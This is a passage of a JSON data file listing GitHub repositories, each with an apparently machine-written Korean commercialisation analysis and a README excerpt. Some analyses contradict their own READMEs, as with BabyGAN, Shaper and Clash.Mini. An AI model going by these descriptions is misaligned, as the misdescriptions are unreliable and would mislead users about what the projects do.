있나\n- **SaaS 대시보드**: 데이터 관리 솔루션에서 표와 목록의 스크롤을 매끄럽게 처리하여 전문성 있는 인상 제공\n- **전자상거래 플랫폼**: 상품","readme_excerpt":"vue happy scroll\n===\n\n\n<a href=\"https://www.npmjs.com/package/vue-happy-scroll\"><img src=\"https://img.shields.io/npm/dm/vue-happy-scroll.svg\" alt=\"Downloads\"></a>\n<a href=\"https://www.npmjs.com/package/vue-happy-scroll\"><img src=\"https://img.shields.io/npm/v/vue-happy-scroll.svg\" alt=\"Version\"></a>\n<a href=\"https://www.npmjs.com/package/vue-happy-scroll\"><img src=\"https://img.shields.io/github/issues-raw/tangdaohai/vue-happy-scroll.svg\" alt=\"open issues\"></a>\n<a href=\"https://www.npmjs.com/package/vue-happy-scroll\"><img src=\"https://img.shields.io/github/issues-closed-raw/tangdaohai/vue-happy-scroll.svg\" alt=\"closed issues\"></a>\n<a href=\"https://www.npmjs.com/package/vue-happy-scroll\"><img src=\"https://img.shields.io/npm/l/vue-happy-scroll.svg\" alt=\"License\"></a>\n![欢迎PR](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)\n\n| Chrome | Firefox | Safari | Edge |               IE               |\n| :----: | :-----: | :----: | :--: | :----------------------------: |\n|   √    |    √    ","composite_score":0.5027,"license_safety_tag":"safe"},{"name":"ailec0623/DQN_HollowKnight","github_url":"https://github.com/ailec0623/DQN_HollowKnight","stars":10,"language":"Python","license":"unknown","abandonment_months":59,"description":"# ailec0623/DQN_HollowKnight 분석\n\n## 왜 보물인가\n게임 AI가 스스로 학습해서 게임을 자동으로 클리어하도록 만드는 기술로, 향후 로봇이나 자동화 시스템에 응용될 수 있는 핵심 인공지능 알고리즘입니다.\n\n## 어디에 쓸 수 있나\n\n1. **게임 회사의 QA 자동화 서비스**: 새 게임이 출시되기 전 AI가 자동으로 플레이해서 버그를","readme_excerpt":"# Readme\n> I am keeping upgrading this, so the code may change everyday.\n\n## Environment\n\n- windows 10 (We use win32 API to operate the little knight and get screenshots)\n- python 3.8.8\n- python liberary: find in `requirments.txt`\n- Hollow Knight\n- HP Bar mod for Hollow Knight (In order to get the boss hp to calculate the reward, please find the mod in `./hollow_knight_Data/`, and then copy the mod file to the game folder)\n- CUDA and cudnn for tensorflow\n\n## Usage\n\n- Now I only write train.py but not test.py (the file is just test some base functions not for model), you can write it by yourself if you get a good model.\n- I upload a saving file, if you never played this game, please move `/save_file/user3.dat` into save folder (usually `C:\\user\\_username_\\AppData\\LocalLow\\Team Cherry\\Hollow Knight`)\n- Adjust the game resolution to 1920*1017 \n- Run train.py\n- Keep the game window at the forefront (Since I cannot send keyboard event in the background, I tried `PossMassage()` in win32 API,","composite_score":0.5027,"license_safety_tag":"unknown"},{"name":"shuding/y86","github_url":"https://github.com/shuding/y86","stars":7,"language":"JavaScript","license":"MIT","abandonment_months":66,"description":"# shuding/y86 분석 보고서\n\n## 왜 보물인가\n컴퓨터가 명령을 이해하고 실행하는 원리를 배울 수 있는 교육용 시뮬레이터로, 컴퓨터 공학 입문자들이 복잡한 이론을 직관적으로 학습할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 대학교 컴퓨터 공학과의 수업 콘텐츠로 제공하거나 Coursera, Udemy 같은 온라인 강의","readme_excerpt":"# Y86 Emulator\n\n[![](https://img.shields.io/website-up-down-green-red/http/y86.js.org.svg?label=y86.js.org)](http://y86.js.org)\n\n[y86.js.org](http://y86.js.org) is a JavaScript powered, Y86 pipeline CPU emulator with a sci-fi UI (Y86 is a classic project in book CS:APP3e).\n\n![screenshot](screenshot.png)\n\n## Details\n\n1. Only supports .yo code\n2. Using Angular + Angular-route\n3. move.js for CSS3 animations\n4. Implemented a simple CommonJS module loader and a canvas CPI curve graph plotter\n\n## Notes\n\n1. All dependencies are included. So I can use `gh-pages` as the main branch.\n2. To open it locally, please host the static files under a HTTP server. The `file://` protocol won't work.\n\n## Acknowledgement\n\n- Author: Shu Ding\n- Special thanks: Linghao Zhang, Yifu Yu.\n- License: the MIT license\n","composite_score":0.5027,"license_safety_tag":"safe"},{"name":"aws-samples/serverless-sinatra-sample","github_url":"https://github.com/aws-samples/serverless-sinatra-sample","stars":8,"language":"Ruby","license":"Apache-2.0","abandonment_months":48,"description":"# aws-samples/serverless-sinatra-sample 분석\n\n## 왜 보물인가\n복잡한 서버 관리 없이 웹 애플리케이션을 클라우드에서 간단하게 실행할 수 있는 기술 샘플로, 작은 팀이 대규모 인프라 투자 없이 서비스를 시작할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소규모 B2B 관리 대시보드나 데이터 분석","readme_excerpt":"## Running Ruby Sinatra on AWS Lambda\n\nThis sample code helps get you started with a simple Sinatra web app deployed on AWS Lambda. It is tested with Ruby 2.5.x and bundler-1.17.x. \n\nAdditional details can be found at: https://aws.amazon.com/blogs/compute/announcing-ruby-support-for-aws-lambda/\n\n__Other resources:__\n\nRuby Sinatra on AWS Lambda: https://blog.eq8.eu/article/sinatra-on-aws-lambda.html\n\nWe want FaaS for Ruby: https://www.serverless-ruby.org/\n\nWhat's Here\n-----------\n\nThis sample includes:\n\n* README.md - this file\n* Gemfile - Gem requirements for the sample application\n* app/config.ru - this file contains configuration for Rack middleware\n* app/server.rb - this file contains the code for the sample service\n* app/views - this directory has the template files\n* spec/ - this directory contains the RSpec unit tests for the sample application\n* template.yaml - this file contains the description of AWS resources used by AWS\n  CloudFormation to deploy your serverless application\n*","composite_score":0.5027,"license_safety_tag":"safe"},{"name":"web3-php/web3","github_url":"https://github.com/web3-php/web3","stars":6,"language":"PHP","license":"MIT","abandonment_months":51,"description":"# web3-php/web3 분석 보고서\n\n## 왜 보물인가\n암호화폐와 블록체인 기술을 일반 웹사이트에 쉽게 연결할 수 있는 도구로, 금융 서비스의 디지털화가 가속화되는 시대에 필수적인 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **암호화폐 거래소 SaaS**: 회사원도 블록체인 자산을 쉽게 거래할 수 있는 웹사이트 구축\n2. **NFT 마켓플레이스 AP","readme_excerpt":"<p align=\"center\">\n    <img src=\"https://raw.githubusercontent.com/web3-php/art/master/editor-without-bg.png\" width=\"600\" alt=\"Web3 PHP\">\n    <p align=\"center\">\n        <a href=\"https://github.com/web3-php/web3/actions\"><img alt=\"GitHub Workflow Status (master)\" src=\"https://img.shields.io/github/workflow/status/web3-php/web3/Tests/master\"></a>\n        <a href=\"https://packagist.org/packages/web3-php/web3\"><img alt=\"Total Downloads\" src=\"https://img.shields.io/packagist/dt/web3-php/web3\"></a>\n        <a href=\"https://packagist.org/packages/web3-php/web3\"><img alt=\"Latest Version\" src=\"https://img.shields.io/packagist/v/web3-php/web3\"></a>\n        <a href=\"https://packagist.org/packages/web3-php/web3\"><img alt=\"License\" src=\"https://img.shields.io/packagist/l/web3-php/web3\"></a>\n    </p>\n</p>\n\n------\n**Web3 PHP** is a supercharged PHP API client that allows you to interact with a generic Ethereum RPC.\n\n> This project is a work-in-progress. Code and documentation are currently under deve","composite_score":0.5027,"license_safety_tag":"safe"},{"name":"azuoge/Opanorama","github_url":"https://github.com/azuoge/Opanorama","stars":10,"language":"JavaScript","license":"unknown","abandonment_months":82,"description":"# Opanorama 저장소 분석\n\n## 왜 보물인가\n360도 파노라마 이미지를 웹에서 쉽게 보여주는 도구로, 부동산·관광·제품 촬영 등 다양한 산업에서 고객 경험을 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 부동산 중개소나 여행사가 월 구독으로 파노라마 뷰어를 웹사이트에 임베드하는 서비스\n- **내부 업무 도구**: 대","readme_excerpt":"[Opanorama.js](https://azuoge.github.io/Opanorama/) 基于Threejs，同时支持手势和陀螺仪的web全景JS库。\n\n亲，觉得好用，给个star！！！\n\n```html\n<script src=\"https://threejs.org/build/three.js\"></script>\n<script src=\"/dist/Opanorama.js\"></script>\n```\n\n```js\nconst panorama = new Opanorama({\n    url: '',                    //全景图片\n    container: document.body,   //容器\n    radius: 500,                //球体半径，可不填\n    fov: 90,                    //相机视角，可用于放大和缩小图片，可不填\n    offsetLongitude: 0,         //经度偏移量，可用于默认展示图片位置，可不填\n    offsetLatitude: 0,          //纬度偏移量，可用于默认展示图片位置，可不填\n    supportTouch: true,         //是否支持手指滑动，可不填\n    supportOrient: true         //是否支持陀螺仪，可不填\n});\n```\n\n[代码示例](https://azuoge.github.io/Opanorama/) \n\n特性:\n> 1、使用一阶滞后滤波算法解决部分安卓机型陀螺仪输入数值抖动的问题；<br>\n> 2、同时支持手势和陀螺仪交互。\n","composite_score":0.5027,"license_safety_tag":"unknown"},{"name":"lucidrains/x-clip","github_url":"https://github.com/lucidrains/x-clip","stars":37,"language":"Python","license":"MIT","abandonment_months":32,"description":"# X-CLIP 저장소 분석\n\n## 왜 보물인가\n이미지와 텍스트를 함께 이해하는 인공지능 기술로, 사진 속 물체를 글로 설명하거나 글로 찾는 고도의 검색 기능을 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 스마트 이미지 검색 플랫폼**\n사용자가 텍스트로 입력한 설명으로 자신의 사진을 찾아주는 클라우드 앨범 서비스\n\n**2. 내","readme_excerpt":"<img src=\"./clip.png\" width=\"600px\"></img>\n\n<a href=\"https://discord.gg/xBPBXfcFHd\"><img alt=\"Join us on Discord\" src=\"https://img.shields.io/discord/823813159592001537?color=5865F2&logo=discord&logoColor=white\"></a>\n\n## x-clip\n\nA concise but complete implementation of <a href=\"https://openai.com/blog/clip/\">CLIP</a> with various experimental improvements from recent papers\n\n## Install\n\n```bash\n$ pip install x-clip\n```\n\n## Usage\n\n```python\nimport torch\nfrom x_clip import CLIP\n\nclip = CLIP(\n    dim_text = 512,\n    dim_image = 512,\n    dim_latent = 512,\n    num_text_tokens = 10000,\n    text_enc_depth = 6,\n    text_seq_len = 256,\n    text_heads = 8,\n    visual_enc_depth = 6,\n    visual_image_size = 256,\n    visual_patch_size = 32,\n    visual_heads = 8,\n    visual_patch_dropout = 0.5,             # patch dropout probability, used in Kaiming He's FLIP to save compute and improve end results - 0.5 is good value, 0.75 on high end is tolerable\n    use_all_token_embeds = False,           # whet","composite_score":0.5027,"license_safety_tag":"safe"},{"name":"hpc203/YOLOP-opencv-dnn","github_url":"https://github.com/hpc203/YOLOP-opencv-dnn","stars":6,"language":"Python","license":"unknown","abandonment_months":51,"description":"# YOLOP-opencv-dnn 분석 보고서\n\n## 왜 보물인가\n자동차 카메라가 도로, 차선, 보행자를 동시에 인식하는 기술로, 자율주행차와 운전 보조 시스템에 필수적인 핵심 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **자율주행 차량 SaaS**: 자동차 제조사에 실시간 도로 인식 API 제공하는 구독 서비스\n2. **운전 보조 앱**: 일반 운전자","readme_excerpt":"# YOLOP-opencv-dnn\n使用OpenCV部署全景驾驶感知网络YOLOP，可同时处理交通目标检测、可驾驶区域分割、车道线检测，三项视觉感知任务，依然是包含C++和Python两种版本的程序实现\n\nonnx文件从百度云盘下载，链接：https://pan.baidu.com/s/1A_9cldUHeY9GUle_HO4Crg \n提取码：mf1x\n\nC++版本的主程序文件是main.cpp，Python版本的主程序文件是main.py。把onnx文件下载到主程序文件所在目录后，就可以运行程序了。文件夹images\n里含有若干张测试图片，来自于bdd100k自动驾驶数据集。\n\n本套程序是在华中科技大学视觉团队在最近发布的项目https://github.com/hustvl/YOLOP\n的基础上做的一个opencv推理部署程序，本套程序只依赖opencv库就可以运行，\n从而彻底摆脱对任何深度学习框架的依赖。如果程序运行出错，那很有可能是您安装的opencv版本低了，这时升级opencv版本就能正常运行的。\n\n此外，在本套程序里，还有一个export_onnx.py文件，它是生成onnx文件的程序。不过，export_onnx.py文件不能本套程序目录内运行的，\n假如您想了解如何生成.onnx文件，需要把export_onnx.py文件拷贝到https://github.com/hustvl/YOLOP\n的主目录里之后，并且修改lib/models/common.py里的代码，\n这时运行export_onnx.py就可以生成onnx文件了。在lib/models/common.py里修改哪些代码，可以参见我的csdn博客文章\nhttps://blog.csdn.net/nihate/article/details/112731327\n","composite_score":0.5027,"license_safety_tag":"unknown"},{"name":"Apple-Music-Electron/Apple-Music-Electron","github_url":"https://github.com/Apple-Music-Electron/Apple-Music-Electron","stars":7,"language":"JavaScript","license":"MIT","abandonment_months":53,"description":"# Apple-Music-Electron 분석\n\n## 왜 보물인가\n애플 뮤직을 컴퓨터에서 편하게 사용할 수 있는 독립 프로그램으로, 공식 앱보다 가볍고 맞춤형으로 음악을 감상할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **음악 스트리밍 플랫폼**: 애플 뮤직 구독자를 위한 경량 데스크톱 앱으로 월 구독 서비스로 제공\n2. **음악 프로덕션 도구**: ","readme_excerpt":"<p align=\"center\">\r\n  <img src=\"https://user-images.githubusercontent.com/85196642/142362989-ca1cb245-d9f1-4345-99fb-939171fb34ee.gif\" width=\"80%\" alt=\"Banner\"><br><br>\r\n</p>\r\n\r\n<p align=\"center\">\r\n  <img src=\"https://user-images.githubusercontent.com/33162551/148161981-5e81b24d-3f6f-4694-a13a-6d8cdc62ca89.png\" width=\"70%\" height=\"40%\" alt=\"Migration\">\r\n</p>\r\n<p align=\"center\"> ⚠️ <b>AME has reached its EOL. <a target=\"_blank\" href=\"https://github.com/ciderapp/Cider\"> Cider is our newest project focused on Apple Music, see it here. </a> ⚠️ </p>\r\n\r\n<br>\r\n<p align=\"center\">\r\n  <a> Credits </a>\r\n</p>\r\n\r\n![Contributors](https://contrib.rocks/image?repo=Apple-Music-Electron/Apple-Music-Electron)\r\n\r\n<p align=\"center\">\r\n  <br>\r\n  <a> Project Supporters </a>\r\n  <br>\r\n  <br>\r\n  <img href=\"https://www.jetbrains.com/\" width=\"120px\" height=\"125px\" src=\"https://logonoid.com/images/jetbrains-logo.png\" alt=\"JetBrains\">\r\n  <img href=\"https://www.macstadium.com/\" width=\"300px\" src=\"https://user-images.","composite_score":0.5027,"license_safety_tag":"safe"},{"name":"villasv/aws-airflow-stack","github_url":"https://github.com/villasv/aws-airflow-stack","stars":5,"language":"Python","license":"MIT","abandonment_months":56,"description":"# AWS Airflow Stack 상업화 분석\n\n## 왜 보물인가\n클라우드 환경에서 복잡한 데이터 작업을 자동으로 관리해주는 오픈소스 기반 솔루션으로, 기업의 반복적인 데이터 처리 업무를 효율화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**SaaS 서비스**: 중소 기업을 위한 \"자동 데이터 정리 및 리포트 생성 클라우드 서비스\" (엑셀 파일 자동 정","readme_excerpt":"> ⚠️ This project is no longer receiving updates. We have moved on from using CloudFormation to manage our infrastructure and recommend others doing the same. As of 2021/2022, we think CDK and Terraform are now the best in class for IaC. Also, Airflow for Kubernetes has gotten more traction and we have moved into EKS for our self-managed Airflow. If you're looking for Open Source Airflow deployment options, we recommend [Astronomer](https://www.astronomer.io/).\n\n<img src=\".github/img/logo.png\" align=\"right\" width=\"25%\" />\n\n# Turbine [![GitHub Release](https://img.shields.io/github/release/villasv/aws-airflow-stack.svg?style=flat-square&logo=github)](https://github.com/villasv/aws-airflow-stack/releases/latest) [![Build Status](https://img.shields.io/github/workflow/status/villasv/aws-airflow-stack/Stack%20Release%20Pipeline?style=flat-square&logo=github&logoColor=white&label=build)](https://github.com/villasv/aws-airflow-stack/actions?query=workflow%3A%22Stack+Release+Pipeline%22+branc","composite_score":0.5026,"license_safety_tag":"safe"},{"name":"alexjlockwood/avdo","github_url":"https://github.com/alexjlockwood/avdo","stars":36,"language":"TypeScript","license":"MIT","abandonment_months":74,"description":"# alexjlockwood/avdo 상용화 분석\n\n## 왜 보물인가\n안드로이드 앱의 복잡한 애니메이션을 코드 없이 시각적으로 만들고 관리할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 모바일 앱 제작 플랫폼에서 노코드 애니메이션 기능을 번들로 판매\n2. **내부 업무 도구**: 안드로이드 개발사의 디자이너-개발자 협업 플","readme_excerpt":"# avocado\n\n[![Build status][travis-badge]][travis-badge-url]\n[![npm version][npm-badge]][npm-badge-url]\n[![Coverage status][coveralls-badge]][coveralls-badge-url]\n\n`avocado` is a command line tool (similar to [`svgo`][svgo]) that optimizes Android\n`VectorDrawable` (VD) and `AnimatedVectorDrawable` (AVD) xml files.\n\n## Installation\n\nYou can install `avocado` using [npm][npm] w/ the following command:\n\n```sh\nnpm install -g avocado\n```\n\n## Usage\n\n```text\nUsage: avocado [options] [file]\n\nOptions:\n\n  -V, --version          output the version number\n  -s, --string <string>  input VD or AVD string\n  -i, --input <file>     input file/directory, or \"-\" for STDIN\n  -o, --output <file>    output file/directory (same as the input file by default), or \"-\" for STDOUT\n  -d, --dir <dir>        optimizes and rewrite all *.xml files in a directory\n  -q, --quiet            only output error messages\n  -h, --help             output usage information\n```\n\n### Examples\n\n```sh\n# Optimize (and overwrite) a VD","composite_score":0.5026,"license_safety_tag":"safe"},{"name":"datastaxdevs/workshop-spring-stargate","github_url":"https://github.com/datastaxdevs/workshop-spring-stargate","stars":15,"language":"JavaScript","license":"MIT","abandonment_months":44,"description":"# Workshop Spring Stargate 프로젝트 평가\n\n## 왜 보물인가\n데이터베이스를 쉽게 연결하고 관리할 수 있는 기술을 배우고 실습할 수 있는 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 데이터 기반 애플리케이션 개발 교육 플랫폼으로 운영하며 월별 구독료 수집\n2. **내부 업무 도구**: 기업의 개발팀 교육용 ","readme_excerpt":"# ![ok](https://github.com/DataStax-Academy/AstraPortia/blob/master/0_materials/ico.jpg?raw=true) Workshop Spring Data Cassandra and Stargate\n\n[![Gitpod ready-to-code](https://img.shields.io/badge/Gitpod-ready--to--code-blue?logo=gitpod)](https://gitpod.io/#https://github.com/DataStax-Academy/workshop-spring-data-cassandra)\n[![License Apache2](https://img.shields.io/hexpm/l/plug.svg)](http://www.apache.org/licenses/LICENSE-2.0)\n[![Discord](https://img.shields.io/discord/685554030159593522)](https://discord.com/widget?id=685554030159593522&theme=dark)\n\nToday we showcase an application using **Apache Cassandra™** as a backend implemented with **Spring Boot**, **Spring Data**, the **[Stargate](http://stargate.io)** and related SDK.\n\n![SplashScreen](images/tutorials/splash.png?raw=true)\n\nWhich better business domain than the TV Show **Stargate** hoping it will not bring any confusion ^^.\n\n![SplashScreen](images/tutorials/pic-travel.png?raw=true)\n\nℹ️ **Frequently asked questions**\n\n- _Can I","composite_score":0.5026,"license_safety_tag":"safe"},{"name":"tg-bomze/BabyGAN","github_url":"https://github.com/tg-bomze/BabyGAN","stars":12,"language":"Jupyter Notebook","license":"unknown","abandonment_months":37,"description":"# BabyGAN 상용화 분석\n\n## 왜 보물인가\n작은 규모의 인공지능 모델로도 고품질의 이미지를 생성할 수 있어, 저성능 기기에서도 사용 가능한 경량 AI 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스마트폰 앱 기반 AI 일러스트 생성 서비스로, 사용자가 텍스트 설명만으로 그림을 만들도록 제공\n2. **내부 업무 도구**: 광고","readme_excerpt":"# BabyGAN\n\n![logo](https://raw.githubusercontent.com/tg-bomze/BabyGAN/master/media/logo.png)\n\n**Check how it works online:**\n- Russian Language [![Colab](https://camo.githubusercontent.com/52feade06f2fecbf006889a904d221e6a730c194/68747470733a2f2f636f6c61622e72657365617263682e676f6f676c652e636f6d2f6173736574732f636f6c61622d62616467652e737667)](https://colab.research.google.com/github/tg-bomze/BabyGAN/blob/master/BabyGAN_(RUS).ipynb)\n- English Language [![Colab](https://camo.githubusercontent.com/52feade06f2fecbf006889a904d221e6a730c194/68747470733a2f2f636f6c61622e72657365617263682e676f6f676c652e636f6d2f6173736574732f636f6c61622d62616467652e737667)](https://colab.research.google.com/github/tg-bomze/BabyGAN/blob/master/BabyGAN_(ENG).ipynb)\n\n<p>\nStyleGAN-based predictor of children's faces from photographs of theoretical parents. The latent representation is extracted from the input images, after which the algorithm mixes them in certain proportions. The neural network model is based on th","composite_score":0.5026,"license_safety_tag":"unknown"},{"name":"liuwei1206/LEBERT","github_url":"https://github.com/liuwei1206/LEBERT","stars":12,"language":"Python","license":"unknown","abandonment_months":53,"description":"# LEBERT 저장소 분석\n\n## 왜 보물인가\n자연어 처리 분야에서 언어 이해 능력을 강화한 AI 모델로, 텍스트 분석이 필요한 다양한 비즈니스에 활용할 수 있는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **고객 상담 자동화 SaaS**: 채팅봇이나 이메일 자동 응답 시스템에 내장하여 고객 의도를 정확히 파악\n2. **기업 문서 분류 도구**: ","readme_excerpt":"# Lexicon Enhanced Chinese Sequence Labeling Using BERT Adapter\n\nCode and checkpoints for the ACL2021 paper \"[Lexicon Enhanced Chinese Sequence Labelling Using BERT Adapter](https://aclanthology.org/2021.acl-long.454.pdf)\"\n\nArxiv link of the paper: https://arxiv.org/abs/2105.07148\n\nIf any questions, please contact the email: willie1206@163.com\n\n# Requirement\n\n* Python 3.7.0\n* Transformer 3.4.0\n* Numpy 1.18.5\n* Packaging 17.1\n* skicit-learn 0.23.2\n* torch 1.6.0+cu92\n* tqdm 4.50.2\n* multiprocess 0.70.10\n* tensorflow 2.3.1\n* tensorboardX 2.1\n* seqeval 1.2.1\n\n# Input Format\nCoNLL format (prefer BIOES tag scheme), with each character its label for one line. Sentences are splited with a null line.\n\n```cpp\n美   B-LOC  \n国   E-LOC  \n的   O  \n华   B-PER  \n莱   I-PER  \n士   E-PER  \n\n我   O  \n跟   O  \n他   O  \n谈   O  \n笑   O  \n风   O  \n生   O   \n```\n\n# Chinese BERT，Chinese Word Embedding, and Checkpoints\n### Chinese BERT\n\nChinese BERT: https://huggingface.co/bert-base-chinese/tree/main <!--https://cdn.huggin","composite_score":0.5026,"license_safety_tag":"unknown"},{"name":"spencerwooo/dowww","github_url":"https://github.com/spencerwooo/dowww","stars":48,"language":"","license":"CC-BY-SA-4.0","abandonment_months":52,"description":"# dowww 저장소 분석\n\n## 왜 보물인가\nWindows 개발자들이 명령줄 환경을 Linux처럼 편하게 쓸 수 있도록 도와주는 설정 가이드입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발자용 환경 설정 자동화 플랫폼으로, 초보자가 몇 클릭으로 Windows 개발환경을 완성할 수 있는 구독형 서비스\n2. **내부 업무 도구**: IT","readme_excerpt":"<div align=\"center\">\n<img src=\"docs/.vuepress/public/hero.png\" alt=\"icon\" width=\"120px\"/>\n\n<h1>Dev on Windows with WSL</h1>\n\n<h4>在 Windows 上面用 WSL 优雅开发</h4>\n\n[![GitHub contributors](https://img.shields.io/github/contributors/spencerwooo/dowww?color=2db74d&logo=github&labelColor=212c42)](#contributing-贡献)\n[![Open Collective backers and sponsors](https://img.shields.io/opencollective/all/dowww?logo=open-collective&color=2db74d&logoColor=ffffff&labelColor=212c42)](#sponsoring-赞助)\n[![Windows](https://img.shields.io/badge/windows-%E2%9D%A4%20linux-212c42?logo=windows&labelColor=0078d6)](https://cloudblogs.microsoft.com/windowsserver/2015/05/06/microsoft-loves-linux/)\n[![License: CC BY-SA 4.0](https://img.shields.io/github/license/spencerwooo/dowww?color=265ca2&labelColor=212c42)](http://creativecommons.org/licenses/by-sa/4.0/)\n[![GitHub stars](https://img.shields.io/github/stars/spencerwooo/dowww?style=social)](https://github.com/spencerwooo/dowww)\n</div>\n\n<h2>目录</h2>\n\n- [前言](#前言)\n- [贡献](#贡","composite_score":0.5026,"license_safety_tag":"unknown"},{"name":"hihayk/shaper","github_url":"https://github.com/hihayk/shaper","stars":9,"language":"JavaScript","license":"unknown","abandonment_months":41,"description":"# hihayk/shaper 분석 보고서\n\n## 왜 보물인가\n복잡한 데이터를 시각적으로 아름답게 정렬하고 정리하는 도구로, 디자인과 데이터 관리가 필요한 모든 분야에서 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 이미지 편집, 디자인 템플릿 생성, 콘텐츠 자동 배치 기능을 제공하는 웹 기반 디자인 툴\n2. **내부 업무 도구*","readme_excerpt":"# [SHAPER](https://hihayk.github.io/shaper/) — interface styles shaper\n\n![](https://github.com/hihayk/shaper/blob/master/public/shaper-editing.gif?raw=true)\n","composite_score":0.5025,"license_safety_tag":"unknown"},{"name":"AhmadRafiee/Docker_training_with_DockerMe","github_url":"https://github.com/AhmadRafiee/Docker_training_with_DockerMe","stars":6,"language":"HTML","license":"Apache-2.0","abandonment_months":29,"description":"# Docker 교육 자료 저장소 분석\n\n## 왜 보물인가\n복잡한 서버 관리 기술을 배우고 싶은 개발자들이 체계적으로 학습할 수 있는 교재 역할을 하는 오픈소스 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 교육 SaaS**: 신입 개발자 온보딩용 동영상 강좌 플랫폼으로 판매\n2. **클라우드 컨설팅 서비스**: IT 기업들의 서버 이전 프로젝트","readme_excerpt":"# Docker training with DockerMe\n### The tools and sample needed to learn the Docker\n\n\n# Table and Content\n  - [Configuration](configuration)\n    - [daemon config](configuration/docker_daemon_config.md)\n    - [docker networking](configuration/networking.md)\n    - [daemon network bridge](configuration/bridge-networking.md)\n    - [daemon network overlay](configuration/overlay-networking.md)\n    - [docker logging plugin](configuration/plugin-logging.md)\n    - [docker volume plugin](configuration/plugin-volumes.md)\n  - [Scenario](scenario)\n    - [running first container](scenario/running_first_container.md)\n    - [webapps with docker](scenario/webapps_with_docker.md)\n    - [portainer with docker](scenario/portainer-docker-compose.yml)\n    - [graylog with docker](scenario/graylog-docker-compose.yml)\n    - [weavescope with docker](scenario/weavescope-docker-compose.yml)\n    - [wordpress with docker](scenario/wordpress-with-nginx)\n    - [nginx with docker](scenario/web-service-nginx)\n    - [pr","composite_score":0.5025,"license_safety_tag":"safe"},{"name":"Clash-Mini/Clash.Mini","github_url":"https://github.com/Clash-Mini/Clash.Mini","stars":19,"language":"Go","license":"AGPL-3.0","abandonment_months":39,"description":"# Clash.Mini 평가 보고서\n\n## 왜 보물인가\n작은 규모로 시작해서 빠르게 확장할 수 있는 '미니' 버전의 네트워크 도구로, 개인 사용자부터 소규모 팀까지 저비용으로 접근 가능합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 인터넷 속도 최적화 솔루션으로 구독형 서비스 제공 (월 9.99달러~)\n2. **내부 업무 도구**: 회사","readme_excerpt":"<h1 align=\"center\">\n  <img src=\"https://raw.githubusercontent.com/Clash-Mini/Clash.Mini/master/icon/Clash.Mini.ico\" alt=\"Clash.Mini\" width=\"200\">\n  <br>Clash.Mini<br>\n</h1>\n\n<h4 align=\"center\">A simple GUI for Clash.</h4>\n\n<div align=\"center\">\n\n![Stars](https://img.shields.io/github/stars/Clash-Mini/Clash.Mini?color=red&style=flat-square)\n<a href=\"https://github.com/Clash-Mini/Clash.Mini/releases\">\n![release](https://img.shields.io/github/release/Clash-Mini/Clash.Mini/all.svg?&color=E761A4&style=flat-square)\n</a><a href=\"https://goreportcard.com/report/github.com/Clash-Mini/Clash.Mini\">\n![GitHub all releases](https://img.shields.io/github/downloads/Clash-Mini/Clash.Mini/total?style=flat-square)\n</a>\n![Issues](https://img.shields.io/github/issues/Clash-Mini/Clash.Mini?color=orange&style=flat-square)\n![RunTime](https://img.shields.io/static/v1?label=runtime&message=GO&color=blue&style=flat-square)\n<br>\n[![Release Windows](https://github.com/Clash-Mini/Clash.Mini/actions/workflows/build_r","composite_score":0.5025,"license_safety_tag":"risky"},{"name":"bheisler/RustaCUDA","github_url":"https://github.com/bheisler/RustaCUDA","stars":5,"language":"Rust","license":"Apache-2.0","abandonment_months":49,"description":"# RustaCUDA 보물지도\n\n## 왜 보물인가\n그래픽카드의 초고속 계산 능력을 쉽게 활용할 수 있도록 만든 도구라서, AI 모델 학습이나 대량 데이터 처리가 필요한 회사들이 비용을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**SaaS 서비스**: 이미지 인식이나 음성 처리 같은 AI 기반 웹 서비스를 제공할 때, 그래픽카드 성능을 활용하면","readme_excerpt":"<h1 align=\"center\">RustaCUDA</h1>\r\n\r\n<div align=\"center\">High-level Interface to <a href=\"https://developer.nvidia.com/cuda-zone\">NVIDIA® CUDA™ Driver API</a> in Rust</div>\r\n\r\n<div align=\"center\">\r\n    <a href=\"https://bheisler.github.io/RustaCUDA/rustacuda/index.html\">API Documentation (master branch)</a>\r\n</div>\r\n\r\n<div align=\"center\">\r\n\t<a href=\"https://travis-ci.org/bheisler/RustaCUDA\">\r\n        <img src=\"https://travis-ci.org/bheisler/RustaCUDA.svg?branch=master\" alt=\"Travis-CI\">\r\n    </a>\r\n</div>\r\n\r\nRustaCUDA helps you bring GPU-acceleration to your projects by providing a flexible, easy-to-use\r\ninterface to the CUDA GPU computing toolkit. RustaCUDA makes it easy to manage GPU memory,\r\ntransfer data to and from the GPU, and load and launch compute kernels written in any language.\r\n\r\n## Table of Contents\r\n- [Table of Contents](#table-of-contents)\r\n  - [Goals](#goals)\r\n  - [Roadmap](#roadmap)\r\n  - [Quickstart](#quickstart)\r\n  - [Contributing](#contributing)\r\n  - [Maintenance](#main","composite_score":0.5025,"license_safety_tag":"safe"},{"name":"bincrafters/community","github_url":"https://github.com/bincrafters/community","stars":53,"language":"Python","license":"MIT","abandonment_months":25,"description":"# bincrafters/community 분석 보고서\n\n## 왜 보물인가\n오픈소스 소프트웨어 패키징 커뮤니티로, 개발자들이 필요한 도구들을 쉽게 찾고 공유할 수 있는 중앙 허브 역할을 합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업용 소프트웨어 배포 플랫폼으로, 회사들이 필요한 개발 도구를 한 곳에서 관리하고 구독하는 